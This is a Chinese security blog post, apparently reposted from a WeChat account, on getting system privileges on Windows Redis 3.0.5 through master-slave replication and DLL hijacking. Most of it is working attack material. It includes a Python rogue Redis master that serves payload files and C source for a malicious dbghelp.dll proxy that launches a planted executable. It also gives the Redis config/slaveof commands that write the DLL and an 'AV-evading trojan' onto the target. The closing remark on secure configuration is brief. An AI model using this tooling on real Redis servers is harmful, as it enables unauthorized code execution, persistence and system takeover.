windows利用Redis主从复制获取系统权限

admin 2024年11月9日16:37:57评论5 views字数 19763阅读65分52秒阅读模式

前言

 redis在Linux中获取权限的办法较多,而在windows中Linux的那些获取权限办法基本无法使用,在windows中获取权限比较通用的是主从复制这个办法。

一、主从复制在windows中的问题

    1. 在内网中最常见的是[redis3.0.5](https://github.com/microsoftarchive/redis)版本及以下,在Linux中的主从复制使用了module这个功能,通过主从复制向redis添加一个可执行命令的函数实现攻击,而module这个功能在redis4这个版本中引入的,所以在redis3中无法通过module添加执行命令函数。

    2. redis4可以使用module添加执行命令函数,但是需要编写执行命令的dll文件,尝试写过相应的dll,dll非常容易导致redis服务挂掉。

二、使用dll劫持解决无module功能

 windows下的redis存在dll劫持漏洞,仅测试redis3.0.5(https://github.com/microsoftarchive/redis),这个时候就可以绕过module这个限制,利用dll劫持这个漏洞加载我们的dll文件。

三、攻击步骤演示

1. 搭建一个恶意的redis

    python redis.py --lport 6379 -f dbghelp.dll

import socketfrom time import sleepfrom optparse import OptionParserdef RogueServer(lport):    CLRF = "rn"    resp = b""    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    sock.bind(("0.0.0.0", lport))    sock.listen(10)    conn, address = sock.accept()      sleep(5)    while True:        data = conn.recv(1024)        data = data.decode()        if "PING" in data:            resp = ("+PONG" + CLRF).encode()            conn.send(resp)        elif "REPLCONF" in data:            resp = ("+OK" + CLRF).encode()            conn.send(resp)        elif "PSYNC" in data or "SYNC" in data:            resp = ("+FULLRESYNC " + "Z" * 40 + " 1" + CLRF).encode()            resp += ("$" + str(len(payload)) + CLRF).encode()            resp += payload + CLRF.encode()            conn.send(resp)        else:            breakif __name__ == "__main__":    parser = OptionParser()                         parser.add_option("--lport", dest="lp", type="int", help="rogue server listen port, default 6379", default=6379, metavar="LOCAL_PORT")            parser.add_option("-f", "--exp", dest="exp", type="string", help="Redis Module to load, default exp.so", default="exp.so", metavar="EXP_FILE")                (options, args) = parser.parse_args()    lport = options.lp    exp_filename = options.exp    CLRF = "rn"    with open(exp_filename, "rb") as f:        payload = f.read()    print("Start listening on port: %s" % lport)    print("Load the payload: %s" % exp_filename)    RogueServer(lport)

2. 编写dll代码

    网上有些文章会直接加载cs的shellcode,这种方式有概率会导致redis-server服务挂掉,所以我这里通过创建进程实现。使用dll_hack(https://github.com/JKme/sb_kiddie-/tree/master/hacking_win/dll_hijack)创建vs项目python dll_hack.py C:windowssystem32dbghelp.dll这个dll直接在操作系统中搜索就能找到。创建好项目后使用以下代码实现创建进程,就算创建失败也不会导致redis挂掉。

#include "dbghelp.h"TCHAR tzPath[MAX_PATH];HMODULE sysdll;VOID TestCreateProcessByAppName() {    STARTUPINFO si = { 0 };    PROCESS_INFORMATION pi;    si.cb = sizeof(si);    TCHAR szAppName[] = TEXT("C:\users\public\IconCache.exe");    BOOL bRes = CreateProcess(szAppName, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);}BOOL APIENTRY DllMain( HMODULE hModule,                       DWORD  ul_reason_for_call,                       LPVOID lpReserved                     ){    switch (ul_reason_for_call)    {    case DLL_PROCESS_ATTACH:        GetSystemDirectory(tzPath, MAX_PATH);        lstrcat(tzPath, TEXT("\dbghelp"));        sysdll = LoadLibrary(tzPath);        g_DbgHelpCreateUserDump = GetProcAddress(sysdll, "DbgHelpCreateUserDump");        g_DbgHelpCreateUserDumpW = GetProcAddress(sysdll, "DbgHelpCreateUserDumpW");        g_EnumDirTree = GetProcAddress(sysdll, "EnumDirTree");        g_EnumDirTreeW = GetProcAddress(sysdll, "EnumDirTreeW");        g_EnumerateLoadedModules = GetProcAddress(sysdll, "EnumerateLoadedModules");        g_EnumerateLoadedModules64 = GetProcAddress(sysdll, "EnumerateLoadedModules64");        g_EnumerateLoadedModulesEx = GetProcAddress(sysdll, "EnumerateLoadedModulesEx");        g_EnumerateLoadedModulesExW = GetProcAddress(sysdll, "EnumerateLoadedModulesExW");        g_EnumerateLoadedModulesW64 = GetProcAddress(sysdll, "EnumerateLoadedModulesW64");        g_ExtensionApiVersion = GetProcAddress(sysdll, "ExtensionApiVersion");        g_FindDebugInfoFile = GetProcAddress(sysdll, "FindDebugInfoFile");        g_FindDebugInfoFileEx = GetProcAddress(sysdll, "FindDebugInfoFileEx");        g_FindDebugInfoFileExW = GetProcAddress(sysdll, "FindDebugInfoFileExW");        g_FindExecutableImage = GetProcAddress(sysdll, "FindExecutableImage");        g_FindExecutableImageEx = GetProcAddress(sysdll, "FindExecutableImageEx");        g_FindExecutableImageExW = GetProcAddress(sysdll, "FindExecutableImageExW");        g_FindFileInPath = GetProcAddress(sysdll, "FindFileInPath");        g_FindFileInSearchPath = GetProcAddress(sysdll, "FindFileInSearchPath");        g_GetSymLoadError = GetProcAddress(sysdll, "GetSymLoadError");        g_GetTimestampForLoadedLibrary = GetProcAddress(sysdll, "GetTimestampForLoadedLibrary");        g_ImageDirectoryEntryToData = GetProcAddress(sysdll, "ImageDirectoryEntryToData");        g_ImageDirectoryEntryToDataEx = GetProcAddress(sysdll, "ImageDirectoryEntryToDataEx");        g_ImageNtHeader = GetProcAddress(sysdll, "ImageNtHeader");        g_ImageRvaToSection = GetProcAddress(sysdll, "ImageRvaToSection");        g_ImageRvaToVa = GetProcAddress(sysdll, "ImageRvaToVa");        g_ImagehlpApiVersion = GetProcAddress(sysdll, "ImagehlpApiVersion");        g_ImagehlpApiVersionEx = GetProcAddress(sysdll, "ImagehlpApiVersionEx");        g_MakeSureDirectoryPathExists = GetProcAddress(sysdll, "MakeSureDirectoryPathExists");        g_MiniDumpReadDumpStream = GetProcAddress(sysdll, "MiniDumpReadDumpStream");        g_MiniDumpWriteDump = GetProcAddress(sysdll, "MiniDumpWriteDump");        g_RangeMapAddPeImageSections = GetProcAddress(sysdll, "RangeMapAddPeImageSections");        g_RangeMapCreate = GetProcAddress(sysdll, "RangeMapCreate");        g_RangeMapFree = GetProcAddress(sysdll, "RangeMapFree");        g_RangeMapRead = GetProcAddress(sysdll, "RangeMapRead");        g_RangeMapRemove = GetProcAddress(sysdll, "RangeMapRemove");        g_RangeMapWrite = GetProcAddress(sysdll, "RangeMapWrite");        g_RemoveInvalidModuleList = GetProcAddress(sysdll, "RemoveInvalidModuleList");        g_ReportSymbolLoadSummary = GetProcAddress(sysdll, "ReportSymbolLoadSummary");        g_SearchTreeForFile = GetProcAddress(sysdll, "SearchTreeForFile");        g_SearchTreeForFileW = GetProcAddress(sysdll, "SearchTreeForFileW");        g_SetCheckUserInterruptShared = GetProcAddress(sysdll, "SetCheckUserInterruptShared");        g_SetSymLoadError = GetProcAddress(sysdll, "SetSymLoadError");        g_StackWalk = GetProcAddress(sysdll, "StackWalk");        g_StackWalk64 = GetProcAddress(sysdll, "StackWalk64");        g_StackWalkEx = GetProcAddress(sysdll, "StackWalkEx");        g_SymAddSourceStream = GetProcAddress(sysdll, "SymAddSourceStream");        g_SymAddSourceStreamA = GetProcAddress(sysdll, "SymAddSourceStreamA");        g_SymAddSourceStreamW = GetProcAddress(sysdll, "SymAddSourceStreamW");        g_SymAddSymbol = GetProcAddress(sysdll, "SymAddSymbol");        g_SymAddSymbolW = GetProcAddress(sysdll, "SymAddSymbolW");        g_SymAddrIncludeInlineTrace = GetProcAddress(sysdll, "SymAddrIncludeInlineTrace");        g_SymAllocDiaString = GetProcAddress(sysdll, "SymAllocDiaString");        g_SymCleanup = GetProcAddress(sysdll, "SymCleanup");        g_SymCompareInlineTrace = GetProcAddress(sysdll, "SymCompareInlineTrace");        g_SymDeleteSymbol = GetProcAddress(sysdll, "SymDeleteSymbol");        g_SymDeleteSymbolW = GetProcAddress(sysdll, "SymDeleteSymbolW");        g_SymEnumLines = GetProcAddress(sysdll, "SymEnumLines");        g_SymEnumLinesW = GetProcAddress(sysdll, "SymEnumLinesW");        g_SymEnumProcesses = GetProcAddress(sysdll, "SymEnumProcesses");        g_SymEnumSourceFileTokens = GetProcAddress(sysdll, "SymEnumSourceFileTokens");        g_SymEnumSourceFiles = GetProcAddress(sysdll, "SymEnumSourceFiles");        g_SymEnumSourceFilesW = GetProcAddress(sysdll, "SymEnumSourceFilesW");        g_SymEnumSourceLines = GetProcAddress(sysdll, "SymEnumSourceLines");        g_SymEnumSourceLinesW = GetProcAddress(sysdll, "SymEnumSourceLinesW");        g_SymEnumSym = GetProcAddress(sysdll, "SymEnumSym");        g_SymEnumSymbols = GetProcAddress(sysdll, "SymEnumSymbols");        g_SymEnumSymbolsEx = GetProcAddress(sysdll, "SymEnumSymbolsEx");        g_SymEnumSymbolsExW = GetProcAddress(sysdll, "SymEnumSymbolsExW");        g_SymEnumSymbolsForAddr = GetProcAddress(sysdll, "SymEnumSymbolsForAddr");        g_SymEnumSymbolsForAddrW = GetProcAddress(sysdll, "SymEnumSymbolsForAddrW");        g_SymEnumSymbolsW = GetProcAddress(sysdll, "SymEnumSymbolsW");        g_SymEnumTypes = GetProcAddress(sysdll, "SymEnumTypes");        g_SymEnumTypesByName = GetProcAddress(sysdll, "SymEnumTypesByName");        g_SymEnumTypesByNameW = GetProcAddress(sysdll, "SymEnumTypesByNameW");        g_SymEnumTypesW = GetProcAddress(sysdll, "SymEnumTypesW");        g_SymEnumerateModules = GetProcAddress(sysdll, "SymEnumerateModules");        g_SymEnumerateModules64 = GetProcAddress(sysdll, "SymEnumerateModules64");        g_SymEnumerateModulesW64 = GetProcAddress(sysdll, "SymEnumerateModulesW64");        g_SymEnumerateSymbols = GetProcAddress(sysdll, "SymEnumerateSymbols");        g_SymEnumerateSymbols64 = GetProcAddress(sysdll, "SymEnumerateSymbols64");        g_SymEnumerateSymbolsW = GetProcAddress(sysdll, "SymEnumerateSymbolsW");        g_SymEnumerateSymbolsW64 = GetProcAddress(sysdll, "SymEnumerateSymbolsW64");        g_SymFindDebugInfoFile = GetProcAddress(sysdll, "SymFindDebugInfoFile");        g_SymFindDebugInfoFileW = GetProcAddress(sysdll, "SymFindDebugInfoFileW");        g_SymFindExecutableImage = GetProcAddress(sysdll, "SymFindExecutableImage");        g_SymFindExecutableImageW = GetProcAddress(sysdll, "SymFindExecutableImageW");        g_SymFindFileInPath = GetProcAddress(sysdll, "SymFindFileInPath");        g_SymFindFileInPathW = GetProcAddress(sysdll, "SymFindFileInPathW");        g_SymFreeDiaString = GetProcAddress(sysdll, "SymFreeDiaString");        g_SymFromAddr = GetProcAddress(sysdll, "SymFromAddr");        g_SymFromAddrW = GetProcAddress(sysdll, "SymFromAddrW");        g_SymFromIndex = GetProcAddress(sysdll, "SymFromIndex");        g_SymFromIndexW = GetProcAddress(sysdll, "SymFromIndexW");        g_SymFromInlineContext = GetProcAddress(sysdll, "SymFromInlineContext");        g_SymFromInlineContextW = GetProcAddress(sysdll, "SymFromInlineContextW");        g_SymFromName = GetProcAddress(sysdll, "SymFromName");        g_SymFromNameW = GetProcAddress(sysdll, "SymFromNameW");        g_SymFromToken = GetProcAddress(sysdll, "SymFromToken");        g_SymFromTokenW = GetProcAddress(sysdll, "SymFromTokenW");        g_SymFunctionTableAccess = GetProcAddress(sysdll, "SymFunctionTableAccess");        g_SymFunctionTableAccess64 = GetProcAddress(sysdll, "SymFunctionTableAccess64");        g_SymFunctionTableAccess64AccessRoutines = GetProcAddress(sysdll, "SymFunctionTableAccess64AccessRoutines");        g_SymGetDiaSession = GetProcAddress(sysdll, "SymGetDiaSession");        g_SymGetExtendedOption = GetProcAddress(sysdll, "SymGetExtendedOption");        g_SymGetFileLineOffsets64 = GetProcAddress(sysdll, "SymGetFileLineOffsets64");        g_SymGetHomeDirectory = GetProcAddress(sysdll, "SymGetHomeDirectory");        g_SymGetHomeDirectoryW = GetProcAddress(sysdll, "SymGetHomeDirectoryW");        g_SymGetLineFromAddr = GetProcAddress(sysdll, "SymGetLineFromAddr");        g_SymGetLineFromAddr64 = GetProcAddress(sysdll, "SymGetLineFromAddr64");        g_SymGetLineFromAddrEx = GetProcAddress(sysdll, "SymGetLineFromAddrEx");        g_SymGetLineFromAddrW64 = GetProcAddress(sysdll, "SymGetLineFromAddrW64");        g_SymGetLineFromInlineContext = GetProcAddress(sysdll, "SymGetLineFromInlineContext");        g_SymGetLineFromInlineContextW = GetProcAddress(sysdll, "SymGetLineFromInlineContextW");        g_SymGetLineFromName = GetProcAddress(sysdll, "SymGetLineFromName");        g_SymGetLineFromName64 = GetProcAddress(sysdll, "SymGetLineFromName64");        g_SymGetLineFromNameEx = GetProcAddress(sysdll, "SymGetLineFromNameEx");        g_SymGetLineFromNameW64 = GetProcAddress(sysdll, "SymGetLineFromNameW64");        g_SymGetLineNext = GetProcAddress(sysdll, "SymGetLineNext");        g_SymGetLineNext64 = GetProcAddress(sysdll, "SymGetLineNext64");        g_SymGetLineNextEx = GetProcAddress(sysdll, "SymGetLineNextEx");        g_SymGetLineNextW64 = GetProcAddress(sysdll, "SymGetLineNextW64");        g_SymGetLinePrev = GetProcAddress(sysdll, "SymGetLinePrev");        g_SymGetLinePrev64 = GetProcAddress(sysdll, "SymGetLinePrev64");        g_SymGetLinePrevEx = GetProcAddress(sysdll, "SymGetLinePrevEx");        g_SymGetLinePrevW64 = GetProcAddress(sysdll, "SymGetLinePrevW64");        g_SymGetModuleBase = GetProcAddress(sysdll, "SymGetModuleBase");        g_SymGetModuleBase64 = GetProcAddress(sysdll, "SymGetModuleBase64");        g_SymGetModuleInfo = GetProcAddress(sysdll, "SymGetModuleInfo");        g_SymGetModuleInfo64 = GetProcAddress(sysdll, "SymGetModuleInfo64");        g_SymGetModuleInfoW = GetProcAddress(sysdll, "SymGetModuleInfoW");        g_SymGetModuleInfoW64 = GetProcAddress(sysdll, "SymGetModuleInfoW64");        g_SymGetOmapBlockBase = GetProcAddress(sysdll, "SymGetOmapBlockBase");        g_SymGetOmaps = GetProcAddress(sysdll, "SymGetOmaps");        g_SymGetOptions = GetProcAddress(sysdll, "SymGetOptions");        g_SymGetScope = GetProcAddress(sysdll, "SymGetScope");        g_SymGetScopeW = GetProcAddress(sysdll, "SymGetScopeW");        g_SymGetSearchPath = GetProcAddress(sysdll, "SymGetSearchPath");        g_SymGetSearchPathW = GetProcAddress(sysdll, "SymGetSearchPathW");        g_SymGetSourceFile = GetProcAddress(sysdll, "SymGetSourceFile");        g_SymGetSourceFileChecksum = GetProcAddress(sysdll, "SymGetSourceFileChecksum");        g_SymGetSourceFileChecksumW = GetProcAddress(sysdll, "SymGetSourceFileChecksumW");        g_SymGetSourceFileFromToken = GetProcAddress(sysdll, "SymGetSourceFileFromToken");        g_SymGetSourceFileFromTokenW = GetProcAddress(sysdll, "SymGetSourceFileFromTokenW");        g_SymGetSourceFileToken = GetProcAddress(sysdll, "SymGetSourceFileToken");        g_SymGetSourceFileTokenW = GetProcAddress(sysdll, "SymGetSourceFileTokenW");        g_SymGetSourceFileW = GetProcAddress(sysdll, "SymGetSourceFileW");        g_SymGetSourceVarFromToken = GetProcAddress(sysdll, "SymGetSourceVarFromToken");        g_SymGetSourceVarFromTokenW = GetProcAddress(sysdll, "SymGetSourceVarFromTokenW");        g_SymGetSymFromAddr = GetProcAddress(sysdll, "SymGetSymFromAddr");        g_SymGetSymFromAddr64 = GetProcAddress(sysdll, "SymGetSymFromAddr64");        g_SymGetSymFromName = GetProcAddress(sysdll, "SymGetSymFromName");        g_SymGetSymFromName64 = GetProcAddress(sysdll, "SymGetSymFromName64");        g_SymGetSymNext = GetProcAddress(sysdll, "SymGetSymNext");        g_SymGetSymNext64 = GetProcAddress(sysdll, "SymGetSymNext64");        g_SymGetSymPrev = GetProcAddress(sysdll, "SymGetSymPrev");        g_SymGetSymPrev64 = GetProcAddress(sysdll, "SymGetSymPrev64");        g_SymGetSymbolFile = GetProcAddress(sysdll, "SymGetSymbolFile");        g_SymGetSymbolFileW = GetProcAddress(sysdll, "SymGetSymbolFileW");        g_SymGetTypeFromName = GetProcAddress(sysdll, "SymGetTypeFromName");        g_SymGetTypeFromNameW = GetProcAddress(sysdll, "SymGetTypeFromNameW");        g_SymGetTypeInfo = GetProcAddress(sysdll, "SymGetTypeInfo");        g_SymGetTypeInfoEx = GetProcAddress(sysdll, "SymGetTypeInfoEx");        g_SymGetUnwindInfo = GetProcAddress(sysdll, "SymGetUnwindInfo");        g_SymInitialize = GetProcAddress(sysdll, "SymInitialize");        g_SymInitializeW = GetProcAddress(sysdll, "SymInitializeW");        g_SymLoadModule = GetProcAddress(sysdll, "SymLoadModule");        g_SymLoadModule64 = GetProcAddress(sysdll, "SymLoadModule64");        g_SymLoadModuleEx = GetProcAddress(sysdll, "SymLoadModuleEx");        g_SymLoadModuleExW = GetProcAddress(sysdll, "SymLoadModuleExW");        g_SymMatchFileName = GetProcAddress(sysdll, "SymMatchFileName");        g_SymMatchFileNameW = GetProcAddress(sysdll, "SymMatchFileNameW");        g_SymMatchString = GetProcAddress(sysdll, "SymMatchString");        g_SymMatchStringA = GetProcAddress(sysdll, "SymMatchStringA");        g_SymMatchStringW = GetProcAddress(sysdll, "SymMatchStringW");        g_SymNext = GetProcAddress(sysdll, "SymNext");        g_SymNextW = GetProcAddress(sysdll, "SymNextW");        g_SymPrev = GetProcAddress(sysdll, "SymPrev");        g_SymPrevW = GetProcAddress(sysdll, "SymPrevW");        g_SymQueryInlineTrace = GetProcAddress(sysdll, "SymQueryInlineTrace");        g_SymRefreshModuleList = GetProcAddress(sysdll, "SymRefreshModuleList");        g_SymRegisterCallback = GetProcAddress(sysdll, "SymRegisterCallback");        g_SymRegisterCallback64 = GetProcAddress(sysdll, "SymRegisterCallback64");        g_SymRegisterCallbackW64 = GetProcAddress(sysdll, "SymRegisterCallbackW64");        g_SymRegisterFunctionEntryCallback = GetProcAddress(sysdll, "SymRegisterFunctionEntryCallback");        g_SymRegisterFunctionEntryCallback64 = GetProcAddress(sysdll, "SymRegisterFunctionEntryCallback64");        g_SymSearch = GetProcAddress(sysdll, "SymSearch");        g_SymSearchW = GetProcAddress(sysdll, "SymSearchW");        g_SymSetContext = GetProcAddress(sysdll, "SymSetContext");        g_SymSetDiaSession = GetProcAddress(sysdll, "SymSetDiaSession");        g_SymSetExtendedOption = GetProcAddress(sysdll, "SymSetExtendedOption");        g_SymSetHomeDirectory = GetProcAddress(sysdll, "SymSetHomeDirectory");        g_SymSetHomeDirectoryW = GetProcAddress(sysdll, "SymSetHomeDirectoryW");        g_SymSetOptions = GetProcAddress(sysdll, "SymSetOptions");        g_SymSetParentWindow = GetProcAddress(sysdll, "SymSetParentWindow");        g_SymSetScopeFromAddr = GetProcAddress(sysdll, "SymSetScopeFromAddr");        g_SymSetScopeFromIndex = GetProcAddress(sysdll, "SymSetScopeFromIndex");        g_SymSetScopeFromInlineContext = GetProcAddress(sysdll, "SymSetScopeFromInlineContext");        g_SymSetSearchPath = GetProcAddress(sysdll, "SymSetSearchPath");        g_SymSetSearchPathW = GetProcAddress(sysdll, "SymSetSearchPathW");        g_SymSrvDeltaName = GetProcAddress(sysdll, "SymSrvDeltaName");        g_SymSrvDeltaNameW = GetProcAddress(sysdll, "SymSrvDeltaNameW");        g_SymSrvGetFileIndexInfo = GetProcAddress(sysdll, "SymSrvGetFileIndexInfo");        g_SymSrvGetFileIndexInfoW = GetProcAddress(sysdll, "SymSrvGetFileIndexInfoW");        g_SymSrvGetFileIndexString = GetProcAddress(sysdll, "SymSrvGetFileIndexString");        g_SymSrvGetFileIndexStringW = GetProcAddress(sysdll, "SymSrvGetFileIndexStringW");        g_SymSrvGetFileIndexes = GetProcAddress(sysdll, "SymSrvGetFileIndexes");        g_SymSrvGetFileIndexesW = GetProcAddress(sysdll, "SymSrvGetFileIndexesW");        g_SymSrvGetSupplement = GetProcAddress(sysdll, "SymSrvGetSupplement");        g_SymSrvGetSupplementW = GetProcAddress(sysdll, "SymSrvGetSupplementW");        g_SymSrvIsStore = GetProcAddress(sysdll, "SymSrvIsStore");        g_SymSrvIsStoreW = GetProcAddress(sysdll, "SymSrvIsStoreW");        g_SymSrvStoreFile = GetProcAddress(sysdll, "SymSrvStoreFile");        g_SymSrvStoreFileW = GetProcAddress(sysdll, "SymSrvStoreFileW");        g_SymSrvStoreSupplement = GetProcAddress(sysdll, "SymSrvStoreSupplement");        g_SymSrvStoreSupplementW = GetProcAddress(sysdll, "SymSrvStoreSupplementW");        g_SymUnDName = GetProcAddress(sysdll, "SymUnDName");        g_SymUnDName64 = GetProcAddress(sysdll, "SymUnDName64");        g_SymUnloadModule = GetProcAddress(sysdll, "SymUnloadModule");        g_SymUnloadModule64 = GetProcAddress(sysdll, "SymUnloadModule64");        g_UnDecorateSymbolName = GetProcAddress(sysdll, "UnDecorateSymbolName");        g_UnDecorateSymbolNameW = GetProcAddress(sysdll, "UnDecorateSymbolNameW");        g_WinDbgExtensionDllInit = GetProcAddress(sysdll, "WinDbgExtensionDllInit");        g__EFN_DumpImage = GetProcAddress(sysdll, "_EFN_DumpImage");        g_block = GetProcAddress(sysdll, "block");        g_chksym = GetProcAddress(sysdll, "chksym");        g_dbghelp = GetProcAddress(sysdll, "dbghelp");        g_dh = GetProcAddress(sysdll, "dh");        g_fptr = GetProcAddress(sysdll, "fptr");        g_homedir = GetProcAddress(sysdll, "homedir");        g_inlinedbg = GetProcAddress(sysdll, "inlinedbg");        g_itoldyouso = GetProcAddress(sysdll, "itoldyouso");        g_lmi = GetProcAddress(sysdll, "lmi");        g_lminfo = GetProcAddress(sysdll, "lminfo");        g_omap = GetProcAddress(sysdll, "omap");        g_optdbgdump = GetProcAddress(sysdll, "optdbgdump");        g_optdbgdumpaddr = GetProcAddress(sysdll, "optdbgdumpaddr");        g_srcfiles = GetProcAddress(sysdll, "srcfiles");        g_stack_force_ebp = GetProcAddress(sysdll, "stack_force_ebp");        g_stackdbg = GetProcAddress(sysdll, "stackdbg");        g_sym = GetProcAddress(sysdll, "sym");        g_symsrv = GetProcAddress(sysdll, "symsrv");        g_vc7fpo = GetProcAddress(sysdll, "vc7fpo");        TestCreateProcessByAppName();    case DLL_THREAD_ATTACH:    case DLL_THREAD_DETACH:    case DLL_PROCESS_DETACH:        break;    }    return TRUE;}

3. 上传dll到redis

    攻击者连接 Redis 服务,并执行以下命令将目标 Redis 设置为攻击者控制的从节点。

#设置redis的备份路径为当前目录    config set dir ./#设置备份文件名为dbghelp.dll,默认为dump.rdb    config set dbfilename dbghelp.dll#设置主服务器IP和端口    slaveof 192.168.172.129 6379#服务端断开后    config set dbfilename dump.rdb#切断主从,关闭复制功能    slaveof no one

4. 上传免杀的exe木马(自备)

    python redis.py --lport 6379 -f IconCache.exe

#设置redis的备份路径为当前目录    config set dir C:UsersPublic#设置备份文件名为IconCache.exe,默认为dump.rdb    config set dbfilename IconCache.exe#设置主服务器IP和端口    slaveof 192.168.172.129 6379#服务端断开后    config set dir ./    config set dbfilename dump.rdb#切断主从,关闭复制功能    slaveof no one #调用dbghelp.dll    bgsave

四、结语

    Redis 的主从复制功能本质上为 Redis 的高可用性提供了便利,但在默认安全配置不足的情况下,这一特性也为攻击者提供了权限提升的机会。希望本文能够帮助读者更好地理解 Redis 安全配置的重要性,从而在实际部署中规避类似的风险。

点击蓝字 关注我们
windows利用Redis主从复制获取系统权限
关注我们

原文始发于微信公众号(Max安全研究院):windows利用Redis主从复制获取系统权限

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月9日16:37:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   windows利用Redis主从复制获取系统权限https://cn-sec.com/archives/3375883.html

发表评论

匿名网友 填写信息